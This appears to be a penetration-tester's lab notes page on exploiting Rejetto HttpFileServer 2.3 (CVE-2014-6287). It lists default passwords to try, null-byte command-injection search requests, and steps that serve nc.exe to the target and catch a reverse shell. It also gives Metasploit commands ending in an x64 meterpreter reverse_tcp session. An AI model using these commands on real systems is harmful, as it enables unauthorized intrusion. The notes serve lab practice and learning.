HttpFileServer (HFS)

Basics

  • Webserver designed for publishing and sharing files

  • Developed by Rejetto

http://10.x.x.x .. Port 80 HttpFileServer (HFS 2.3)

Password Guessing

admin:admin 
admin:password 
root:password 
root:root 
admin:fileserver

HFS 2.3 Remote Command Execution (RCE)

  • Vulnerable to remote code execution attacks

  • Due to a poor regex in the file ParserLib.pas

  • https://www.exploit-db.com/exploits/39161

  • Execute arbitrary programs using %00 (null byte) sequence in a search action.

  • Which terminates the regular expression but not the entire string.

  • HFS has settings to secure against searching with { } . |

Explore HFS

GET /?search=%00 HTTP/1.1                            ..original
GET /?search=%00{.exec|ping 10.10.10.14 HTTP/1.1     ..ping
GET /?search=%00{.exec|ping 10.10.10.14.} HTTP/1.1   ..better

tcpdump -i tun0                                      ..confirm pings

Easy Exploit (no msf)

searchsploit rejetto

vim 39161.py                   ..fix localip/port
cp nc.exe .                    ..prep payload
python -m SimpleHTTPServer 80  ..share
http://$MyIP:80/nc.exe         ..confirm path
python 39161.py <IP> <Port>    ..method
python 39171.py 10.x.x.x 80    ..exploit (try 4x)
nc -nvlp 4444                  ..listen

Rejetto v2.3 RCE - Metasploit

  • rejetto_hfs_exec

  • CVE-2014-6287

--------------------
Google
httpfileserver vulnerability
httpfileserver metasploit
httpfileserver CVE

Found... "Remote Code Execution", Rejetto, CVE-2014-6287

--------------------
Metasploit
> searchsploit HTTPFileServer   .. nothing
> searchsploit HFS              .. Rejetto HTTP v2.3

> msfconsole
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> show options
> set RHOST $IP
> set LHOST $MyIP
> set SRVHOST $MyIP
> set LPORT 5555
> run

Meterpreter 64

  • Session is 32 bit, but Server is 64

  • Set a new Payload

> sysinfo
Computer: OPTIMUM
OS: Windows 2012 R2
Arch: x64                        ..64 bit
Meterpreter: x86/Windows         ..32 bit

> background
msf> show options
msf> set payload windows/x64/meterpreter/reverse_tcp     ..new Payload
msf> set LPORT 51001                                     ..new Port
msf> run                                                 ..connected!

PreviousElastix FreePBXNextIIS

Last updated